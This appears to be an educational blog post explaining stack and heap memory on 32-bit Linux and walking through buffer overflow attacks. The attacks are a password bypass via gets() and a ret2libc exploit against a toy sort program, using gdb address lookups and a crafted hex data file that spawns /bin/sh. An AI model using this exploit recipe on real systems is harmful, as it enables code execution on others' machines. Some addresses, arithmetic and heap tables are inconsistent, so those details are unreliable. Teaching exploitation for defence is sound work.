All Articles

Smashing The Stack

Of the many varieties of software security exploits, none are more basic, straightforward, and potentially devastating as the buffer overflow attack. A well executed attack on poorly protected program can grant the attacker full access to the computer. To understand this attack, we begin by analyzing the memory layout of typical Linux machines and how data is manipulated by programs. With a little understanding, we can build to exploit an innocuous sorting program by simply passing in a nefarious list of numbers. But first, we must understand the source of the exploit - the stack buffer.

The Stack

Linux machines leverage a contiguous sequence of memory addresses to hold statically defined variables, i.e., variables that have a set defined size. Here are some examples of statically defined variables in C that live on the stack.

int a = 6;
char b = 'b';
int[] c = {1, 2, 3}

This translates to the following on the stack

Address Human Value Hex Value Binary Value
0xHIGH 6 0x00000006 0b00…00000110
-4 ‘b’ 0x00000060 0b00…01100010
-8 1 0x00000001 0b00…000000001
-12 2 0x00000002 0b00…000000010
0xLOW 3 0x00000003 0b00…000000011

As diagrammed, the stack just holds values in the order they are declared (baring compiler optimizations), growing downwards from high memory addresses to low memory addresses in steps of 4 bytes. Allocating space in steps of 4 bytes ensures the compiler does not become “misaligned” and begin allocating memory starting on weird boundaries.

When we declare int a = 6, the stack allocates 4 bytes (the size of an int on a 32-bit system) and uses all four bytes to represent 6, ala 0x00000006 ala 0b00...00000110.

In the case of char b = 'b', the compiler still issues a 4 byte chunk, even though a char in 32-bit Linux land only takes up 1 byte. Why? Because again, the compiler does not want to be misaligned and place the next value at a non 4 byte boundary. There are manual and compiler optimizations to force these values to “pack” and force the buffer to become misaligned, but we will assume this is not occurring.

In the grand scheme of all memory on the system, the stack is jammed (and sometimes packed) between the Kernal code and some spare spacing memory. All the way at the bottom of the memory is the heap, which allocates memory using a different paradigm that we’ll look at shortly. This ordering is diagramed below.

Address Space
0xHIGH Kernal Code
Stack ⬇️
Spare Memory
0xLOW Heap ⬆️

Control Flow on the Stack

The stack, as the name suggests, implements the stack data structure. That means it solely has two operations: push and pop. To place values on the stack, they are pushed in order. To retrieve values, they are popped off the stack. How can the stack know where values live to pop? There must be something keeping track of the top of the stack. Additionally, how do we navigate from function to function in stackland? This brings us to the concepts of registers and the stack frame.

The (Basic) Stack Frame

Address Data Type Register
0xHIGH Function Parameters
-4 Function Return Address
-8 Saved Previous Base Pointer ◀️$EBP
-12 Local Variables
Buffer
0xLOW ◀️$ESP

This is the basic version of a stack frame. Every function creates a stack frame. This frame places values on the stack in a predicable order, starting with the function parameters, then the address to jump to when the function returns. This is followed by the return value to the previous function’s frame, so nested function calls can always unravel themselves back to the top. Finally, we get to the stack we saw before, where locally declared variables live.

In addition to values on the stack, we have registers that point to places on the stack. These two points are the ◀️$EBP (Extended Base Pointer) that points right above the locally declared variables, AKA “the base of the function”. This gives us a permanent record of where all the variables live as the stack grows. Then, there is the ◀️$ESP (Extended Stack Pointer), which always points to the next available spot on the stack and moves as the stack grows.

Exploiting the Stack Structure

We are just missing one more piece to understand how to exploit the stack, and that is how arrays grow in C. I’ll explain it with a simple example.

#include <stdio.h>
#include <string.h>

int main() {
  int authorized = 0;
  char password[8];
  gets(password); // Get password from user
  if (!strcmp(password, "password")) {
		authorized = 1;
	}
  if (authorized) {
		printf("\nWelcome!\n");
	}
  return 0;
}

This translates to the following stack frame (using 0xFFFFFFFF as either don’t know, don’t care, arbitrary, or undefined).

Address Data Type Value Register
0xHIGH Function Return Address 0xFFFFFFFF
-4 Saved Previous Base Pointer 0xFFFFFFFF ◀$EBP
-8 Local authorized 0
-12 Local password[4-7] 0xFFFFFFFF
-16 Local password[0-3] 0xFFFFFFFF
0xLOW ◀️$ESP

Notice how the array begins at the lowest address values possible and fills in to higher addresses. So when the program sees char password[8], it counts down in the stack 8 bytes (char’s are 1 byte * 8 of them = 8 bytes) and will begin to fill the array from bottom up with no holds barred.

With the intended use of this function (like passing in the correct password password), the following stack frame is achieved.

Address Data Type Value Register
0xHIGH Function Return Address 0xFFFFFFFF
-4 Saved Previous Base Pointer 0xFFFFFFFF ◀️$EBP
-8 Local authorized 1
-12 Local password[4-7] word
-16 Local password[0-3] pass
0xLOW ◀️$ESP

The gets() command waits for user input. Without any validation on length, and input of, say, TomBrady<3, we can force the following stack frame.

Address Data Type Value Register
0xHIGH Function Return Address 0xFFFFFFFF
-4 Saved Previous Base Pointer 0xFFFFFFFF ◀️$EBP
-8 Local authorized <3
-12 Local password[4-7] rady
-16 Local password[0-3] TomB
0xLOW ◀️$ESP

And look! The value of local authorized has been overwritten and we can bypass the password check!

Eeeeeek!

This is the basis for buffer overflow attacks. I.e., writing to an array with data longer than the buffer should allow. This can, as we saw above, overwrite local variables, but the stronger attack is what we can do if we push a little bit more data and overwrite the function return address. By overwriting the return address, we can get the code to run just about anything we want. We’ll see how we can leverage this to exploit a sorting program after we take a brief aside to talk about the other section of user memory - the heap;

The Heap

As diagrammed above, the heap sits at the bottom of memory in the lowest memory addresses. The heap is used to store dynamically allocated data. I.e., data without a compile-time fixed size. This means the heap must be more flexible than the rigid structure of the stack. The flexibility is accomplished by maintaining non-contiguous section of memory that are linked together through pointers. Whereas the stack implements the stack data structure, the heap implements…

A LINKED LIST!

Just like the name suggests… 😓…sigh.

There are two possible states heap “chunks” can be in. They are either allocated after a chunk = malloc() call, or unallocated after a free(chunk) call, as shown here

Allocated

Address Data Type Size
0xLOW Previous Size 4 bytes
+4 Size + Prev in Use 3 bytes + 1 byte
0xHIGH Just Data Who knows?

Unallocated

Address Data Type Size
0xLOW Previous Size 4 bytes
+4 Size + Prev in Use 3 bytes + 1 byte
+8 Forward Pointer (fd) 4 bytes
+12 Backwards Pointer (fd) 4 bytes
0xHIGH Data Who knows?
Note the addresses going from low to high now. The diagram follows the top down convention, however, because it doesn't actually matter that much.

An allocated chunk contains the size of the previous chunk (if allocated), the size of the current chunk (updated as data is added), and a byte indicating if the previous chunk is allocated. Then the data is just plopped and takes up as much space as it needs.

In an unallocated chunk, additional metadata is required. These components are the forward and backwards pointers and point to other unallocated chunks. This allows rapid allocating of chunks as the malloc() function can just traverse the linked list rather than linearly searching all of the heap for a chunk.

Exploiting the Heap

Just as the buffer can be overflowed, the heap can be overflowed in a heap overflow attack. Here’s a basic example

int main() {
	char *buffer;
	buffer = (char*) malloc(sizeof(char) * 4);
	gets(buffer);
	free(buffer);
	return 0;
}

We make a call to malloc() that yields in the following chunk

Address Data Type Value
0xLOW Previous Size 0xFFFFFFFF
+4 Size + Prev in Use 0x000004 + 0x00
0xHIGH Just Data ???

After the gets() call, and a bad actor entering more than 4 bytes, say “Go Jackets”

Address Data Type Value
0xLOW Previous Size 0xFFFFFFFF
+4 Size + Prev in Use 0x000004 + 0x00
+8 ‘Go J’
+12 ‘acke’
0xHIGH ‘ts’

Clearly, the heap doesn’t care and will let you put data there. However, if there was a chunk directly bellow our chunk (or we spam gets() with oodles of data). We can run into the following situation.

Address Data Type Value
0xLOW Previous Size 0xFFFFFFFF
+4 Size + Prev in Use 0x000004 + 0x00
+8 Just Data ‘Go J’
+1 Forward Pointer (fd) ‘acke’
+12 Backwards Pointer (fd) ‘ts’
+12 Previous Size 0xFFFFFFFF
+16 Size + Prev in Use 0x000004 + 0x00
0xHIGH Just Data ???

If we stumble upon an unallocated chunk, we can change the forward and backwards pointers. In this way, we can get the code to move to any address we want when free() is called. Now, the address acte may not be useful, but, what if we gave it an address to system() and had it load up /bin/sh. Not useless anymore, huh? Let’s see how we can do that in the context of buffer overflows.

Exploiting a Buffer Overflow in a Real Program

Ok so all this talk is great, but how could these contrived examples ever pop up in the wild? Let’s look at a section of a simple sorting program.

void SortData() {
  long swap = 0;
  long array[17];

  // loading data to array
  printf("Source list:\n");
  char line[sizeof(long) * 2 + 1] = {0};
  while(fgets(line, sizeof(line), fp)) {
    if (strlen((char *)line) > 1) {
      sscanf(line, "%lx", &(array[n]));
      printf("0x%lx : %ld\n", array[n], array[n]);
      ++n;
    }
  }
  fclose(fp);

  // bubbleSort()...
}

This program instantiates an array of longs, so 174=6817*4=68 bytes. Then it parses a simple text file and sorts it. Easy. So how can this we exploit something like this to run arbitrary code? By overflowing the stack like we did before! Now it’s more malicious though, and we’ll insert a call to system() with a parameter to /bin/sh to load up a shell and give us control. More on these later.

To “smash the stack” as it’s called, we need to get our stack frame from this state, diagramed below immediately after char line[sizeof(long) * 2 + 1] = {0}; is run

Address Data Type Value Register
0xHIGH Function Return Address 0xFFFFFFFF
-4 Saved Previous Base Pointer 0xFFFFFFFF ◀️$EBP
-8 swap 0
-12 local array 0xFFFFFFFF
-16 local array 0xFFFFFFFF
+12 local array [0-3] 0xFFFFFFFF
+8 local line [8] 0x00FFFFFF
+4 local line [4-7] 0x00,0x00,0x00,0x00
0xLOW local line[0-3] 0x00,0x00,0x00,0x00 ◀️$ESP

To this state by the end of the function

Address Data Type Value Register
0xHIGH Function parameters 0x”/bin/sh”
-4 Function Return Address 0x”_exit()”
-8 Saved Previous Base Pointer 0x”system()” ◀️$EBP
-12 local swap 0xaC0FFEE4
-16 local array [16] 0xaC0FFEE4
-20 local array [15] 0xaC0FFEE4
+12 local array [0] 0xaC0FFEE4
+8 local line [8] 0xaC0FFEE4
+4 local line [3-7] 0xaC0FFEE4
0xLOW local line[0-3] 0xaC0FFEE4 ◀️$ESP

Simple as that! Just get the address of the system() function into the function return address and place the address of /bin/sh as the parameter to the function, as well as giving it the value of _exit() so it can return cleanly from the system() call. Once you understand the structure of the stack, making an exploit like this is dead simple.

All that is left is to find the addresses of our three exploit variables and form the malicious text file.

Locating the addresses of system(), /bin/sh, and _exit()

First, what are system(), /bin/sh, and _exit()? And why do we want them?

Well, according to my man

sford$ man system

NAME
       system - execute a shell command

SYNOPSIS
       #include <stdlib.h>

       int system(const char *command);

DESCRIPTION
       system() executes a command specified in command by calling /bin/sh -c command, and returns after the command has been completed.  During execution of the command, SIGCHLD will be blocked, and SIGINT and SIGQUIT will be ignored.

So system accepts one function parameter to a command to execute. Like a wrapper around the command. If we pass in /bin/sh, we can successful spawn a bash shell.

The final piece is the _exit() command, which we shove into hacked stack frame’s function return address to, well, _exit the shell. My man has some thoughts on _exit

sford$ man _exit

NAME
       _exit, _Exit - terminate the calling process

SYNOPSIS
       #include <unistd.h>

       void _exit(int status);

       #include <stdlib.h>

       void _Exit(int status);

   Feature Test Macro Requirements for glibc (see feature_test_macros(7)):

       _Exit():
           _XOPEN_SOURCE >= 600 || _ISOC99_SOURCE || _POSIX_C_SOURCE >= 200112L;
           or cc -std=c99

DESCRIPTION
       The function _exit() terminates the calling process "immediately".  Any open file descriptors belonging to the process are closed; any children of the process are inherited by process 1, init, and the process's parent is sent a SIGCHLD signal.

       The value status is returned to the parent process as the process's exit status, and can be collected using one of the wait(2) family of calls.

       The function _Exit() is equivalent to _exit().

Finding the addresses of these functions is remarkably simple. All it takes is loading up a gdb shell and executing our sort function like to a breakpoint like so

sford$ cc -Wall -o sort sort.c -fno-stack-protector -ggdb # compile with the --ggdb flag
gdb sort
b SortData() # Set breakpoint
r data.txt # Run program with parameter data.txt
find system
> 0xb7e4a1e0
find _exit
> 0xb7eccbc4
find 0xb7e17000,0xb7fbf000,"/bin/sh"
> 0xb7f77a24

The Dangerous Data File

Now we can generate a data file of hex values to “sort” 😈 as follows (ignoring the comments)

ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
ac0ffee4
b7e57190 // system() address
b7eccbc4 // _exit() address
b7f77a24 // /bin/sh address

These 21 aC0FFEE4 SMASH the stack all the way up to the function return address. Then we drop our three special parameters. Once the SortData() function sorts the data, it will attempt to return. This points our instruction pointer to the address of system()! Now execution attempts to continue on this stack frame here.

Address Data Type Value Register
0xHIGH Function parameters 0x”/bin/sh”
-4 Function Return Address 0x”_exit()”
-8 Saved Previous Base Pointer 0x”system()” ◀️$EBP
-12 local swap 0xaC0FFEE4
-16 local array [16] 0xaC0FFEE4
-20 local array [15] 0xaC0FFEE4
+12 local array [0] 0xaC0FFEE4
+8 local line [8] 0xaC0FFEE4
+4 local line [3-7] 0xaC0FFEE4
0xLOW local line[0-3] 0xaC0FFEE4 ◀️$ESP

/bin/sh has become the function parameter to this system call, and _exit() now nicely fills into this frame’s function return address. So when we exit the system() function, we jump to a frame calling _exit() and we make a clean getaway!

Here’s the exploit in action!

Conclusion

Hopefully this discussion elucidates stack buffer overflows. When researching this topic, I struggled to find any visualization of the stack frame, so I created my own. I found them extremely useful in understanding not only the exploit, but the stack as a whole, so I manufactured an article to show them off. DM me with any issues or gaps in my understanding. I’ll add a comment section to this website eventually.

Sources

Kapil, Dhaval. “Buffer Overflow Exploit.” Https://Dhavalkapil.com, 3 Apr. 2015, dhavalkapil.com/blogs/Buffer-Overflow-Exploit/.

“Return Oriented Programming (ROP) Exploit Explained.” Rapid7, www.rapid7.com/resources/rop-exploit-explained/.

“Stack Layouts with a Look Forward to Virtual Addressing Burt Rosenberg Sept 2015 (Revised from 2015 Version) (Revised from 2012 Version).” Stack Layout, www.cs.miami.edu/home/burt/learning/Csc421.171/workbook/stack-memory.html.

“C++ Programming” The Details of C Function Stack (and Heap) Operation When Function Call Is Made (Caller) and Returned (Callee) on Personal Computers, www.tenouk.com/Bufferoverflowc/Bufferoverflow2a.html.